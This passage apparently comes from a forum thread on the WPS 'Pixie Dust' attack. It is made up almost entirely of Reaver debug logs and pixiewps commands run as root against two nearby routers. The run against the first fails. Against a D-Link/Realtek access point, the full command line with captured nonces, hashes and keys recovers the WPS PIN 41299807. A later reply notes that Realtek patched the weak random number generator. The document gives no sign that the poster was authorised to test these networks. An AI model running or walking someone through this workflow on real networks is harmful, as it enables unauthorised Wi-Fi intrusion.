WPS: DH Private Key - hexdump(len=192): 85 7e a7 22 8a 1a 4e d5 7d 1d 3f 7f e5 b9 a5 8d 11 16 74 f2 05 aa cf ed f9 f7 24 26 a3 59 dd 68 32 f1 6a 13 59 73 bc 9d 1a 79 db 55 23 36 3e 55 14 77 30 cd f5 27 e3 73 73 8d db ba 2d 6a 0b 03 20 8b 9e 11 6a 40 2a f3 ab 99 da b8 7b 54 1d 11 6a 42 95 24 86 01 14 28 45 6f 6e 4b 30 42 eb df d3 64 15 76 50 b6 7d 69 db 1d fc 45 09 7f be 6b 58 17 0a 07 2d 6c 0c 40 ce ad 6c 2d f4 11 bb d0 68 0d 38 21 ae 19 ef 34 e5 84 ed a5 f4 27 c4 d0 3d 33 13 ce 25 8b c1 8a a3 d1 f2 a6 00 a5 b4 4a 79 9a 44 6f 63 80 16 6b 6a 55 06 ad 17 cc ea 9e 76 05 49 98 37 60 12 4a 89 42 b4 fa cd fe 7d 71
WPS: DH peer Public Key - hexdump(len=192): d0 14 1b 15 65 6e 96 b8 5f ce ad 2e 8e 76 33 0d 2b 1a c1 57 6b b0 26 e7 a3 28 c0 e1 ba f8 cf 91 66 43 71 17 4c 08 ee 12 ec 92 b0 51 9c 54 87 9f 21 25 5b e5 a8 77 0e 1f a1 88 04 70 ef 42 3c 90 e3 4d 78 47 a6 fc b4 92 45 63 d1 af 1d b0 c4 81 ea d9 85 2c 51 9b f1 dd 42 9c 16 39 51 cf 69 18 1b 13 2a ea 2a 36 84 ca f3 5b c5 4a ca 1b 20 c8 8b b3 b7 33 9f f7 d5 6e 09 13 9d 77 f0 ac 58 07 90 97 93 82 51 db be 75 e8 67 15 cc 6b 7c 0c a9 45 fa 8d d8 d6 61 be b7 3b 41 40 32 79 8d ad ee 32 b5 dd 61 bf 10 5f 18 d8 92 17 76 0b 75 c5 d9 66 a5 a4 90 47 2c eb a9 e3 b4 22 4f 3d 89 fb 2b
DH: shared key - hexdump(len=192): d5 ef c1 da 43 0a a2 2c 86 53 60 fb 7d e7 ea 64 b8 48 15 3d 58 1f 49 fe 60 e3 4e 51 73 fa 22 9d f5 91 fe ea 5b 82 bf 02 20 0d 62 a4 d5 87 19 ce 9d b2 ce fc ca f3 8e 27 21 a4 9b 57 6a bf a8 cc 45 57 3c c1 35 fa dd bc 1f 6b 7b a9 01 e2 8e 87 42 b0 6d 72 26 04 2c 7b 3c 9c 43 f8 5f fa 3f 5c 49 72 61 87 67 1a 09 71 6c b3 16 02 83 85 6f 61 7f 07 31 ef 84 11 cb 45 6e e0 b2 64 64 6a 40 53 70 08 3b ef 8b cd f8 18 80 8d c4 03 98 83 af 55 22 5e 32 46 73 c6 6d d6 7f 12 cc fe c5 38 14 53 bb 0c b6 49 08 d1 6e 4a c2 a5 c4 8a 38 bc b9 de 51 6f 41 d6 36 24 fd 2d ae 78 da 4b 7a 51 1e 88
WPS: DH shared key - hexdump(len=192): d5 ef c1 da 43 0a a2 2c 86 53 60 fb 7d e7 ea 64 b8 48 15 3d 58 1f 49 fe 60 e3 4e 51 73 fa 22 9d f5 91 fe ea 5b 82 bf 02 20 0d 62 a4 d5 87 19 ce 9d b2 ce fc ca f3 8e 27 21 a4 9b 57 6a bf a8 cc 45 57 3c c1 35 fa dd bc 1f 6b 7b a9 01 e2 8e 87 42 b0 6d 72 26 04 2c 7b 3c 9c 43 f8 5f fa 3f 5c 49 72 61 87 67 1a 09 71 6c b3 16 02 83 85 6f 61 7f 07 31 ef 84 11 cb 45 6e e0 b2 64 64 6a 40 53 70 08 3b ef 8b cd f8 18 80 8d c4 03 98 83 af 55 22 5e 32 46 73 c6 6d d6 7f 12 cc fe c5 38 14 53 bb 0c b6 49 08 d1 6e 4a c2 a5 c4 8a 38 bc b9 de 51 6f 41 d6 36 24 fd 2d ae 78 da 4b 7a 51 1e 88
WPS: DHKey - hexdump(len=32): 4a 3b 5d 85 4e 40 bd 4f 38 27 06 6a 5a 9f 80 fb 9d 27 dd b6 21 ef ac 13 7e 52 ff e8 8c ec 30 4f
WPS: KDK - hexdump(len=32): f9 5d b0 3a d6 b8 4e 84 c7 57 a0 c4 d2 bc d5 bd 4f 2f 2e 55 91 25 40 19 7f b8 33 54 b7 99 04 f6
WPS: AuthKey - hexdump(len=32): 24 2c c4 39 5c 80 52 2e db dc 28 7a 4d 28 0f 7e d3 b3 c4 ca 98 e5 26 b7 5e 20 e0 6c c9 01 39 e3
WPS: KeyWrapKey - hexdump(len=16): ba d7 c8 bd 40 6d 69 44 d5 ea 4f 82 02 0a 2b 4a
WPS: EMSK - hexdump(len=32): 61 bf f1 c9 cd 6d 4e 91 18 98 fe d4 ab d3 ee 3a 23 e1 98 ad 20 82 9e 21 ed 53 87 bd e6 b0 14 2f
WPS: * Authentication Type Flags
WPS: * Encryption Type Flags
WPS: * Connection Type Flags
WPS: * Config Methods (8c)
WPS: * Manufacturer
WPS: * Model Name
WPS: * Model Number
WPS: * Serial Number
WPS: * Primary Device Type
WPS: * Device Name
WPS: * RF Bands (0)
WPS: * Association State
WPS: * Configuration Error (0)
WPS: * Device Password ID (0)
WPS: * OS Version
WPS: * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
WPS: Processing received message (len=124 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M3
WPS: E-Hash1 - hexdump(len=32): 7a 7c 07 1e 89 8e 1c f6 70 6c 63 19 5a a8 43 fb e9 c3 db 0d 6d 29 d9 70 d1 1b e4 70 12 0b e6 11
WPS: E-Hash2 - hexdump(len=32): db 62 95 83 3b e0 ce bc ba db c2 e0 1b cf aa e3 1f 68 3c c2 77 3f 4c 20 1f 8f ae 2b 73 0b 52 52
executing pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a3 28c0e1baf8cf91664371174c08ee12ec92b0519c54879f2125 5be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1 af1db0c481ead9852c519bf1dd429c163951cf69181b132aea 2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0 ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661 beb73b414032798dadee32b5dd61bf105f18d89217760b75c5 d966a5a490472ceba9e3b4224f3d89fb2b -s 7a7c071e898e1cf6706c63195aa843fbe9c3db0d6d29d970d1 1be470120be611 -z db6295833be0cebcbadbc2e01bcfaae31f683cc2773f4c201f 8fae2b730b5252 -a 242cc4395c80522edbdc287a4d280f7ed3b3c4ca98e526b75e 20e06cc90139e3 -n ce1219309ec2dc9bd33a70eef846395b -r 6168318eb6a1b18be78880b14a343453131fb1c23911572983 c5984851e4f73edd27db68515177df0e3ba492371b89be8596 061fe7997a4452264d45aa91ec8bb8feb8810f345cd4b1c984 6383c68432e48a83072572973e2b8da5e1d07cc8280e94174d a9cc98a8252220985a11e17c22136bfd30be691667f4e3186b 52ab58ec466a5d7a966346b74262c45c571757017966ba553d 298ac486660ef3bcd42673cacb80c825ee52809f9a9a547586 985d13c3e8d847fd992d828d4fc6bae82a

Pixiewps 1.4

[-] WPS pin not found!

Time taken: 0 s 57 ms
__________________________________________________ __________________________-

root@kali:~# pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a3 28c0e1baf8cf91664371174c08ee12ec92b0519c54879f2125 5be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1 af1db0c481ead9852c519bf1dd429c163951cf69181b132aea 2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0 ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661 beb73b414032798dadee32b5dd61bf105f18d89217760b75c5 d966a5a490472ceba9e3b4224f3d89fb2b -s 7a7c071e898e1cf6706c63195aa843fbe9c3db0d6d29d970d1 1be470120be611 -z db6295833be0cebcbadbc2e01bcfaae31f683cc2773f4c201f 8fae2b730b5252 -a 242cc4395c80522edbdc287a4d280f7ed3b3c4ca98e526b75e 20e06cc90139e3 -n ce1219309ec2dc9bd33a70eef846395b -r 6168318eb6a1b18be78880b14a343453131fb1c23911572983 c5984851e4f73edd27db68515177df0e3ba492371b89be8596 061fe7997a4452264d45aa91ec8bb8feb8810f345cd4b1c984 6383c68432e48a83072572973e2b8da5e1d07cc8280e94174d a9cc98a8252220985a11e17c22136bfd30be691667f4e3186b 52ab58ec466a5d7a966346b74262c45c571757017966ba553d 298ac486660ef3bcd42673cacb80c825ee52809f9a9a547586 985d13c3e8d847fd992d828d4fc6bae82a -f

Pixiewps 1.4

[-] WPS pin not found!

Time taken: 0 s 52 ms

NOW i tried with another router
WASH Data :

"bssid" : "54:B8:0A:15:EA:E0", "essid" : "D-Link 11n AP 2.4G", "channel" : 3, "rssi" : -70, "vendor_oui" : "00E04C", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "D-Link Corp.", "wps_model_name" : "RTL8xxx", "wps_model_number" : "EV-2010-09-20", "wps_device_name" : "RTL8196d", "wps_serial" : "123456789012347", "wps_uuid" : "112233445566778899aa54b80a15eae0", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "2008", "wps_rf_bands" : "03", "dummy": 0}

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan0mon to channel 3
[?] Restore previous session for 54:B8:0A:15:EA:E0? [n/Y] n
[+] Waiting for beacon from 54:B8:0A:15:EA:E0
[+] Received beacon from 54:B8:0A:15:EA:E0
[+] Vendor: RealtekS
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
31 32 33 34 35 36 37 30 12345670
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:333
send_packet called from authenticate() 80211.c:364
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
send_packet called from associate() 80211.c:417
[+] Sending association request
send_packet called from resend_last_packet() send.c:161
[+] Associated with 54:B8:0A:15:EA:E0 (ESSID: D-Link 11n AP 2.4G)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=412 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): 11 22 33 44 55 66 77 88 99 aa 54 b8 0a 15 ea e0
WPS: Enrollee MAC Address 54:b8:0a:15:ea:e0
WPS: Enrollee Nonce - hexdump(len=16): 3d 0c 07 f9 18 2a 7e e7 71 fe 90 63 7b 31 b3 2a
WPS: Enrollee Authentication Type flags 0x21
WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x9
WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x2688 [Display] [PBC]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=12):
44 2d 4c 69 6e 6b 20 43 6f 72 70 2e D-Link Corp.
WPS: Model Name - hexdump_ascii(len=7):
52 54 4c 38 78 78 78 RTL8xxx
WPS: Model Number - hexdump_ascii(len=13):
45 56 2d 32 30 31 30 2d 30 39 2d 32 30 EV-2010-09-20
WPS: Serial Number - hexdump_ascii(len=15):
31 32 33 34 35 36 37 38 39 30 31 32 33 34 37 123456789012347
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=8):
52 54 4c 38 31 39 36 64 RTL8196d
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 10000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 90 39 cd 10 c2 7a 78 37 91 65 8c a1 c8 38 a4 8d
WPS: UUID-R - hexdump(len=16): f1 4e 45 8f 7c 4d d6 d4 bd 81 2c 95 22 d2 11 46
WPS: Building Message M2
WPS: * Version
WPS: * Message Type (5)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * UUID-R
WPS: * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): 74 81 06 e6 c3 c1 1d e6 81 ab c6 99 b8 47 33 2a c5 17 89 f6 f1 87 c5 b2 9d 72 bf 86 98 11 08 13 82 eb 45 b5 9a 6f 63 bb 33 a9 4d 1c 4a 23 f3 f6 3e d3 64 4e 3e 27 75 58 42 b7 97 ea 58 ab 26 2a 97 80 72 94 db 6e d3 5e 90 bd af 5b 56 5a 2d c7 dc 2a 51 2d 3b c7 3d 29 c5 7e 03 49 c5 ea 0d ae 7c f2 30 fc 30 34 6c 49 b8 8a d6 95 3d 4f 36 13 19 54 2a 38 c3 38 55 1a c0 96 f2 3c 8b 28 77 de a6 7b e4 f5 ee 4e 79 87 ba a1 30 37 c9 8a 99 ef 89 13 6f 9a f2 dc 68 5d ce a3 56 d0 ed 67 83 70 08 77 ab 7e 79 dd c8 3a 36 2d a9 dd 3b 85 2b da 9c fc 67 54 e3 2f 85 d4 9a c5 e5 0f 9c 56 69 8d
DH: public value - hexdump(len=192): bf 5c b5 1a 82 d1 f8 6e 10 b6 7b b1 98 3b 86 98 28 e5 ed 0b 6c 94 32 55 0c 35 29 1e ee ea 0d 73 cc 8f f4 7c 15 7b b2 5a 42 ba 4f 39 3c 66 38 95 cc 7e eb ae 48 7a 91 45 56 ef 0f 18 10 54 01 3f bb c3 b1 8d b6 d9 03 48 2b c2 57 ad b1 f2 7d 41 7e 71 d3 a3 7e 93 6d b6 8e e8 59 7c 98 54 b3 c8 55 f0 03 2b 96 f1 1c 92 fa 75 17 95 9f 54 43 1a da b1 15 31 2a 3f 4f 2b 01 2b 12 ce c8 0f f6 c6 53 ba 27 17 94 83 fc 29 06 e0 5c 9f 54 c9 0a 8e ad f9 28 39 10 20 17 a5 b4 44 be 7f 54 f2 2d b0 94 f9 e0 8f 73 54 cf fe b6 e8 a8 b5 eb 68 93 35 20 c5 96 82 65 a2 13 5c ed 88 c5 f7 9f 4b 42 2d
WPS: DH Private Key - hexdump(len=192): 74 81 06 e6 c3 c1 1d e6 81 ab c6 99 b8 47 33 2a c5 17 89 f6 f1 87 c5 b2 9d 72 bf 86 98 11 08 13 82 eb 45 b5 9a 6f 63 bb 33 a9 4d 1c 4a 23 f3 f6 3e d3 64 4e 3e 27 75 58 42 b7 97 ea 58 ab 26 2a 97 80 72 94 db 6e d3 5e 90 bd af 5b 56 5a 2d c7 dc 2a 51 2d 3b c7 3d 29 c5 7e 03 49 c5 ea 0d ae 7c f2 30 fc 30 34 6c 49 b8 8a d6 95 3d 4f 36 13 19 54 2a 38 c3 38 55 1a c0 96 f2 3c 8b 28 77 de a6 7b e4 f5 ee 4e 79 87 ba a1 30 37 c9 8a 99 ef 89 13 6f 9a f2 dc 68 5d ce a3 56 d0 ed 67 83 70 08 77 ab 7e 79 dd c8 3a 36 2d a9 dd 3b 85 2b da 9c fc 67 54 e3 2f 85 d4 9a c5 e5 0f 9c 56 69 8d
WPS: DH own Public Key - hexdump(len=192): bf 5c b5 1a 82 d1 f8 6e 10 b6 7b b1 98 3b 86 98 28 e5 ed 0b 6c 94 32 55 0c 35 29 1e ee ea 0d 73 cc 8f f4 7c 15 7b b2 5a 42 ba 4f 39 3c 66 38 95 cc 7e eb ae 48 7a 91 45 56 ef 0f 18 10 54 01 3f bb c3 b1 8d b6 d9 03 48 2b c2 57 ad b1 f2 7d 41 7e 71 d3 a3 7e 93 6d b6 8e e8 59 7c 98 54 b3 c8 55 f0 03 2b 96 f1 1c 92 fa 75 17 95 9f 54 43 1a da b1 15 31 2a 3f 4f 2b 01 2b 12 ce c8 0f f6 c6 53 ba 27 17 94 83 fc 29 06 e0 5c 9f 54 c9 0a 8e ad f9 28 39 10 20 17 a5 b4 44 be 7f 54 f2 2d b0 94 f9 e0 8f 73 54 cf fe b6 e8 a8 b5 eb 68 93 35 20 c5 96 82 65 a2 13 5c ed 88 c5 f7 9f 4b 42 2d
WPS: DH Private Key - hexdump(len=192): 74 81 06 e6 c3 c1 1d e6 81 ab c6 99 b8 47 33 2a c5 17 89 f6 f1 87 c5 b2 9d 72 bf 86 98 11 08 13 82 eb 45 b5 9a 6f 63 bb 33 a9 4d 1c 4a 23 f3 f6 3e d3 64 4e 3e 27 75 58 42 b7 97 ea 58 ab 26 2a 97 80 72 94 db 6e d3 5e 90 bd af 5b 56 5a 2d c7 dc 2a 51 2d 3b c7 3d 29 c5 7e 03 49 c5 ea 0d ae 7c f2 30 fc 30 34 6c 49 b8 8a d6 95 3d 4f 36 13 19 54 2a 38 c3 38 55 1a c0 96 f2 3c 8b 28 77 de a6 7b e4 f5 ee 4e 79 87 ba a1 30 37 c9 8a 99 ef 89 13 6f 9a f2 dc 68 5d ce a3 56 d0 ed 67 83 70 08 77 ab 7e 79 dd c8 3a 36 2d a9 dd 3b 85 2b da 9c fc 67 54 e3 2f 85 d4 9a c5 e5 0f 9c 56 69 8d
WPS: DH peer Public Key - hexdump(len=192): d0 14 1b 15 65 6e 96 b8 5f ce ad 2e 8e 76 33 0d 2b 1a c1 57 6b b0 26 e7 a3 28 c0 e1 ba f8 cf 91 66 43 71 17 4c 08 ee 12 ec 92 b0 51 9c 54 87 9f 21 25 5b e5 a8 77 0e 1f a1 88 04 70 ef 42 3c 90 e3 4d 78 47 a6 fc b4 92 45 63 d1 af 1d b0 c4 81 ea d9 85 2c 51 9b f1 dd 42 9c 16 39 51 cf 69 18 1b 13 2a ea 2a 36 84 ca f3 5b c5 4a ca 1b 20 c8 8b b3 b7 33 9f f7 d5 6e 09 13 9d 77 f0 ac 58 07 90 97 93 82 51 db be 75 e8 67 15 cc 6b 7c 0c a9 45 fa 8d d8 d6 61 be b7 3b 41 40 32 79 8d ad ee 32 b5 dd 61 bf 10 5f 18 d8 92 17 76 0b 75 c5 d9 66 a5 a4 90 47 2c eb a9 e3 b4 22 4f 3d 89 fb 2b
DH: shared key - hexdump(len=192): 81 72 43 ce 61 5e 06 3e a3 2c 69 ea a7 13 db f4 58 6e 46 b1 9a 16 99 7c 0e f6 e8 f4 75 84 82 c8 2e 24 37 30 82 9e bd 3d b8 66 dc c9 6d 27 b8 27 0d e8 b3 32 1d 8b 78 07 e4 61 f1 33 e5 cf 1a fb 3c 82 ec 8a ed 2c 99 a4 03 fa 5d 2a b6 7d 5d 98 bf ed a4 21 8c 0b 93 5e 37 da 47 0a 74 98 7b e6 e2 c8 1a b0 07 9d 98 11 ae e4 cb 95 3f ed 0e 28 d5 6d 83 50 f3 f1 f9 43 e8 29 f8 2d 9e b4 7d 9a f1 60 f9 aa 3f bf 06 e1 89 e9 31 6c 31 4d 60 d7 74 12 58 c7 4e 07 bc 2e 4a b4 07 3f 09 f2 9b 64 55 9e 09 6b 3a c5 f6 d8 12 ed a4 18 70 a5 76 73 58 2c 22 c1 ea 67 57 b0 c1 20 a9 97 3c 69 20 4e
WPS: DH shared key - hexdump(len=192): 81 72 43 ce 61 5e 06 3e a3 2c 69 ea a7 13 db f4 58 6e 46 b1 9a 16 99 7c 0e f6 e8 f4 75 84 82 c8 2e 24 37 30 82 9e bd 3d b8 66 dc c9 6d 27 b8 27 0d e8 b3 32 1d 8b 78 07 e4 61 f1 33 e5 cf 1a fb 3c 82 ec 8a ed 2c 99 a4 03 fa 5d 2a b6 7d 5d 98 bf ed a4 21 8c 0b 93 5e 37 da 47 0a 74 98 7b e6 e2 c8 1a b0 07 9d 98 11 ae e4 cb 95 3f ed 0e 28 d5 6d 83 50 f3 f1 f9 43 e8 29 f8 2d 9e b4 7d 9a f1 60 f9 aa 3f bf 06 e1 89 e9 31 6c 31 4d 60 d7 74 12 58 c7 4e 07 bc 2e 4a b4 07 3f 09 f2 9b 64 55 9e 09 6b 3a c5 f6 d8 12 ed a4 18 70 a5 76 73 58 2c 22 c1 ea 67 57 b0 c1 20 a9 97 3c 69 20 4e
WPS: DHKey - hexdump(len=32): 66 3c 56 aa 7c fd d4 81 ac 93 ca 88 1e bd d4 e1 d6 b5 f3 13 a3 bf 9f 42 83 a7 06 cb 71 37 8f d6
WPS: KDK - hexdump(len=32): ce 79 eb ec 0b 03 80 c8 d1 46 5f df d0 57 fa 7f 48 8c 1e d0 f2 34 77 14 49 4b cc 73 6a 76 29 c5
WPS: AuthKey - hexdump(len=32): 25 90 fe aa 96 29 bc 51 c1 7d e8 c1 14 a2 d8 f9 6b 31 6f 28 66 84 c6 b4 7b ee 6e d5 55 65 cf d7
WPS: KeyWrapKey - hexdump(len=16): b6 57 5b 46 94 f7 56 9f ea 4f 6c 68 2d 70 6f 77
WPS: EMSK - hexdump(len=32): a4 ae 91 e2 70 55 50 cb 48 25 21 62 96 aa 15 0d 95 ab 1a 0c 42 47 5e dc d6 18 30 b5 32 21 eb 4b
WPS: * Authentication Type Flags
WPS: * Encryption Type Flags
WPS: * Connection Type Flags
WPS: * Config Methods (8c)
WPS: * Manufacturer
WPS: * Model Name
WPS: * Model Number
WPS: * Serial Number
WPS: * Primary Device Type
WPS: * Device Name
WPS: * RF Bands (0)
WPS: * Association State
WPS: * Configuration Error (0)
WPS: * Device Password ID (0)
WPS: * OS Version
WPS: * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=124 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M3
WPS: E-Hash1 - hexdump(len=32): 0c c6 32 d2 09 fc c3 00 61 b5 4e 6c ad b9 5e bc 20 f3 68 4a 71 43 71 7f 66 72 a0 fd 56 d1 5d 0b
WPS: E-Hash2 - hexdump(len=32): ec 58 b7 05 42 9d aa 80 cf 98 df f8 b6 70 a5 af e9 55 c1 39 69 a1 d4 32 83 9e d1 a4 1c f0 df d1
executing pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a3 28c0e1baf8cf91664371174c08ee12ec92b0519c54879f2125 5be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1 af1db0c481ead9852c519bf1dd429c163951cf69181b132aea 2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0 ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661 beb73b414032798dadee32b5dd61bf105f18d89217760b75c5 d966a5a490472ceba9e3b4224f3d89fb2b -s 0cc632d209fcc30061b54e6cadb95ebc20f3684a7143717f66 72a0fd56d15d0b -z ec58b705429daa80cf98dff8b670a5afe955c13969a1d43283 9ed1a41cf0dfd1 -a 2590feaa9629bc51c17de8c114a2d8f96b316f286684c6b47b ee6ed55565cfd7 -n 3d0c07f9182a7ee771fe90637b31b32a -r bf5cb51a82d1f86e10b67bb1983b869828e5ed0b6c9432550c 35291eeeea0d73cc8ff47c157bb25a42ba4f393c663895cc7e ebae487a914556ef0f181054013fbbc3b18db6d903482bc257 adb1f27d417e71d3a37e936db68ee8597c9854b3c855f0032b 96f11c92fa7517959f54431adab115312a3f4f2b012b12cec8 0ff6c653ba27179483fc2906e05c9f54c90a8eadf928391020 17a5b444be7f54f22db094f9e08f7354cffeb6e8a8b5eb6893 3520c5968265a2135ced88c5f79f4b422d

Pixiewps 1.4

[-] WPS pin not found!

Time taken: 0 s 61 ms

[!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.

root@kali:~# pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a3 28c0e1baf8cf91664371174c08ee12ec92b0519c54879f2125 5be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1 af1db0c481ead9852c519bf1dd429c163951cf69181b132aea 2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0 ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661 beb73b414032798dadee32b5dd61bf105f18d89217760b75c5 d966a5a490472ceba9e3b4224f3d89fb2b -s 0cc632d209fcc30061b54e6cadb95ebc20f3684a7143717f66 72a0fd56d15d0b -z ec58b705429daa80cf98dff8b670a5afe955c13969a1d43283 9ed1a41cf0dfd1 -a 2590feaa9629bc51c17de8c114a2d8f96b316f286684c6b47b ee6ed55565cfd7 -n 3d0c07f9182a7ee771fe90637b31b32a -r bf5cb51a82d1f86e10b67bb1983b869828e5ed0b6c9432550c 35291eeeea0d73cc8ff47c157bb25a42ba4f393c663895cc7e ebae487a914556ef0f181054013fbbc3b18db6d903482bc257 adb1f27d417e71d3a37e936db68ee8597c9854b3c855f0032b 96f11c92fa7517959f54431adab115312a3f4f2b012b12cec8 0ff6c653ba27179483fc2906e05c9f54c90a8eadf928391020 17a5b444be7f54f22db094f9e08f7354cffeb6e8a8b5eb6893 3520c5968265a2135ced88c5f79f4b422d -f

Pixiewps 1.4

[?] Mode: 3 (RTL819x)

Seed N1: 1434604969 (Thu Jun 18 05:22:49 2015 UTC)

Seed ES1: 1434604970 (Thu Jun 18 05:22:50 2015 UTC)

Seed ES2: 1434604970 (Thu Jun 18 05:22:50 2015 UTC)

PSK1: 8324b8e9659ec8250343001f54e42d15

PSK2: 755a3d251b04c08424b30608563cdfbc

ES1: 2a2d66064c4b473057da0e5123463097

ES2: 2a2d66064c4b473057da0e5123463097
[+] WPS pin: 41299807

Time taken: 3 s 265 ms

It did work with the second AP

soxrok2212

2018-06-14, 22:12

Realtek has actually had this patched since ~2016. If you want to look for yourself, hop onto Belkin's website and download the latest firmware and the previous firmware for F9K1105v2, extract them, and do a quick grep for "generate_random". They use /dev/urandom as well as some seemingly custom (and sh!tty) RNG on the side.

bigbiz

2018-07-24, 01:42